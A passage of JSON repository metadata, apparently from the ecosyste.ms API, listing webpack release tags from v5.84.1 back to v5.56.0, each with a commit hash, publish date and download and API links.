32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/r